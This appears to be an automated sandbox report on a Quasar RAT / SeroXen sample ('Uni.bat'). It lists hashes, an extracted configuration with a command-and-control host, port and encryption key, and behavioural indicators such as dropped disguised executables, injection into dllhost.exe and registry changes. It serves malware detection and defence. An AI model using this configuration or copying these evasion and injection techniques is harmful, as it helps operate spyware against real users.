quasar | 78b0a14a882dec287c0dc5a294ad02a4a5aaa0d130839d49f282c7d61069471f

Analysis

max time kernel
1200s
max time network
1198s
platform
windows11-21h2_x64
resource
win11-20240419-en
resource tags

arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system
submitted
20-05-2024 16:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Uni.bat
Size

12.6MB
MD5

898f49c739026123b6a3811fa31abe70
SHA1

31ff6036b40d70d21cb1c4c0163cba0d4c720551
SHA256

78b0a14a882dec287c0dc5a294ad02a4a5aaa0d130839d49f282c7d61069471f
SHA512

a9aa2bf15db84361f315156ee6386cac49c14c2449a72e2f50b2e0b8d100781019c246c03a38a37d5dfc71a7c1c5451457faba074d1a875cab615ecb8d3e453d
SSDEEP

49152:sW7ldCjqzV0qZpSjVbHDGYxqXTQPJee/X5nerh1gnfFijx6ygGSPlPNEIKlfuK1u:i

Score

10^/10

quasar v2.2.5 | seroxen evasion spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.0.0.0

Botnet

v2.2.5 | SeroXen

kimsoylak.ddns.net:4782

Mutex

2cc9d61f-950d-4f23-b7d5-45d9dda2f256

Attributes

encryption_key
F467D794B2E1081B6AD1EAD5813AFA74F053248D
install_name
.exe
log_directory
$sxr-Logs
reconnect_delay
1

Signatures

Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Processes:

Explorer.EXE

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "0"	Explorer.EXE

Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Processes:

Explorer.EXE

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	Explorer.EXE

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral3/memory/1360-64-0x00000224C1D30000-0x00000224C24FA000-memory.dmp	family_quasar

Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

description	pid	process	target process
PID 5536 created 5328	5536	WerFault.exe	dllhost.exe
PID 6128 created 4844	6128	WerFault.exe	dllhost.exe
PID 6064 created 5320	6064	WerFault.exe	dllhost.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs

Processes:

Uni.bat.exe$sxr-powershell.exesvchost.exe

description	pid	process	target process
PID 2624 created 632	2624	Uni.bat.exe	winlogon.exe
PID 1360 created 632	1360	$sxr-powershell.exe	winlogon.exe
PID 1360 created 632	1360	$sxr-powershell.exe	winlogon.exe
PID 2624 created 632	2624	Uni.bat.exe	winlogon.exe
PID 1360 created 632	1360	$sxr-powershell.exe	winlogon.exe
PID 1360 created 632	1360	$sxr-powershell.exe	winlogon.exe
PID 1360 created 632	1360	$sxr-powershell.exe	winlogon.exe
PID 5036 created 5328	5036	svchost.exe	dllhost.exe
PID 5036 created 4844	5036	svchost.exe	dllhost.exe
PID 1360 created 632	1360	$sxr-powershell.exe	winlogon.exe
PID 5036 created 5320	5036	svchost.exe	dllhost.exe
PID 1360 created 632	1360	$sxr-powershell.exe	winlogon.exe

Deletes itself 1 IoCs

Processes:

Uni.bat.exe

pid process

2624 Uni.bat.exe
Executes dropped EXE 5 IoCs

Processes:

Uni.bat.exe$sxr-mshta.exe$sxr-cmd.exe$sxr-powershell.exe$sxr-powershell.exe

pid process

2624 Uni.bat.exe
2244 $sxr-mshta.exe
4660 $sxr-cmd.exe
1360 $sxr-powershell.exe
3900 $sxr-powershell.exe

Drops file in System32 directory 12 IoCs

Processes:

svchost.exeOfficeClickToRun.exesvchost.exeDllHost.exe

description	ioc	process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WER-Diag%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.chk	DllHost.exe

Suspicious use of SetThreadContext 18 IoCs

Processes:

Uni.bat.exe$sxr-powershell.exe

description	pid	process	target process
PID 2624 set thread context of 2604	2624	Uni.bat.exe	dllhost.exe
PID 2624 set thread context of 2452	2624	Uni.bat.exe	dllhost.exe
PID 1360 set thread context of 4868	1360	$sxr-powershell.exe	dllhost.exe
PID 1360 set thread context of 2156	1360	$sxr-powershell.exe	dllhost.exe
PID 1360 set thread context of 3552	1360	$sxr-powershell.exe	dllhost.exe
PID 1360 set thread context of 3044	1360	$sxr-powershell.exe	dllhost.exe
PID 2624 set thread context of 4672	2624	Uni.bat.exe	dllhost.exe
PID 2624 set thread context of 1064	2624	Uni.bat.exe	dllhost.exe
PID 1360 set thread context of 6024	1360	$sxr-powershell.exe	dllhost.exe
PID 1360 set thread context of 5056	1360	$sxr-powershell.exe	dllhost.exe
PID 1360 set thread context of 5264	1360	$sxr-powershell.exe	dllhost.exe
PID 1360 set thread context of 5328	1360	$sxr-powershell.exe	dllhost.exe
PID 1360 set thread context of 4844	1360	$sxr-powershell.exe	dllhost.exe
PID 1360 set thread context of 5776	1360	$sxr-powershell.exe	dllhost.exe
PID 1360 set thread context of 5320	1360	$sxr-powershell.exe	dllhost.exe
PID 1360 set thread context of 6124	1360	$sxr-powershell.exe	dllhost.exe
PID 1360 set thread context of 5224	1360	$sxr-powershell.exe	dllhost.exe
PID 1360 set thread context of 5536	1360	$sxr-powershell.exe	dllhost.exe

Drops file in Windows directory 7 IoCs

Processes:

Uni.bat.exeWerFault.exe

description	ioc	process
File opened for modification	C:\Windows\$sxr-cmd.exe	Uni.bat.exe
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe
File created	C:\Windows\$sxr-powershell.exe	Uni.bat.exe
File opened for modification	C:\Windows\$sxr-powershell.exe	Uni.bat.exe
File created	C:\Windows\$sxr-mshta.exe	Uni.bat.exe
File opened for modification	C:\Windows\$sxr-mshta.exe	Uni.bat.exe
File created	C:\Windows\$sxr-cmd.exe	Uni.bat.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

4192 5328 WerFault.exe dllhost.exe

pid	pid_target	process	target process
4192	5328	WerFault.exe	dllhost.exe

Checks processor information in registry 2 TTPs 23 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exesvchost.exeWerFault.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exeWerFault.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

2284 taskkill.exe

pid	process
2284	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

Processes:

Explorer.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\Toolbar	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	Explorer.EXE

Modifies data under HKEY_USERS 57 IoCs

Processes:

OfficeClickToRun.exesvchost.exesvchost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={453AF952-5678-4983-A91B-F7D586F23203}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Mon, 20 May 2024 16:19:24 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1716221964"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe

Modifies registry class 40 IoCs

Processes:

Explorer.EXEsvchost.exe$sxr-mshta.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\MRUListEx = ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software\Microsoft\SystemCertificates\AuthRoot	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software\Microsoft\SystemCertificates\AuthRoot\AutoUpdate\Disallow = 47a70b61d1aada01	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 = 5600310000000000b4584682100057696e646f777300400009000400efbec5522d60b45846822e000000a60500000000010000000000000000000000000000001f182301570069006e0064006f0077007300000016000000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = 00000000ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software\Microsoft\SystemCertificates	svchost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software\Microsoft\SystemCertificates\AuthRoot\AutoUpdate\Disallow = 1f721061d1aada01	svchost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	$sxr-mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software	svchost.exe
